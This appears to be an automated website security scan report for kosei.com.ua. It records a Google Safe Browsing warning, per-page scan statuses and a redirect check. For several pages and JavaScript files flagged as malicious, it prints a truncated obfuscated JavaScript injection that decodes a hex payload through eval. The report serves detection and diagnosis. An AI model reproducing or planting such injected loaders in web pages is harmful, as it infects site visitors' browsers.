Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kosei.com.ua
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kosei.com.ua/ | 200 OK Content-Length: 24857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/highslide/highslide-with-html.js | 200 OK Content-Length: 69575 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/jquery/jquery.min.js | 200 OK Content-Length: 90102 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://scripts.mycounter.ua/counter2.0.js | 200 OK Content-Length: 3543 Content-Type: application/javascript | clean |
http://www.kosei.com.ua/index.html | 200 OK Content-Length: 24857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/model.htm | 200 OK Content-Length: 55485 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/../www.hosting.dp.ua/Error404.php | 400 Bad Request Content-Length: 289 Content-Type: text/html | clean |
http://www.kosei.com.ua/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 12:32:29 GMT Location: http://www.hosting.dp.ua/Error404.php Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hosting.dp.ua/error404.php | HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 12:32:29 GMT Location: http://www.hosting.dp.ua/Error404.php Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.hosting.dp.ua/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 12:32:29 GMT Location: http://www.hosting.dp.ua/Error404.php Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.kosei.com.ua/dilers.htm | 200 OK Content-Length: 41395 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/c_autoimage.htm | 200 OK Content-Length: 7639 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://www.kosei.com.ua/c_wh_chorch.htm | 200 OK Content-Length: 2940 Content-Type: text/html | clean |
http://www.kosei.com.ua/c_dnepropetrovsk.htm | 200 OK Content-Length: 6947 Content-Type: text/html | clean |
http://www.kosei.com.ua/c_donetsk.htm | 200 OK Content-Length: 4191 Content-Type: text/html | clean |
http://www.kosei.com.ua/c_zaporoje.htm | 200 OK Content-Length: 3263 Content-Type: text/html | clean |
http://www.kosei.com.ua/c_kiev.htm | 200 OK Content-Length: 9599 Content-Type: text/html | clean |
http://www.kosei.com.ua/c_kriv_rog.htm | 200 OK Content-Length: 3261 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kosei.com.ua
Result:
GET / HTTP/1.1
Host: kosei.com.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kosei.com.ua
Referer: http://www.google.com/search?q=kosei.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kosei.com.ua
Referer: http://www.google.com/search?q=kosei.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.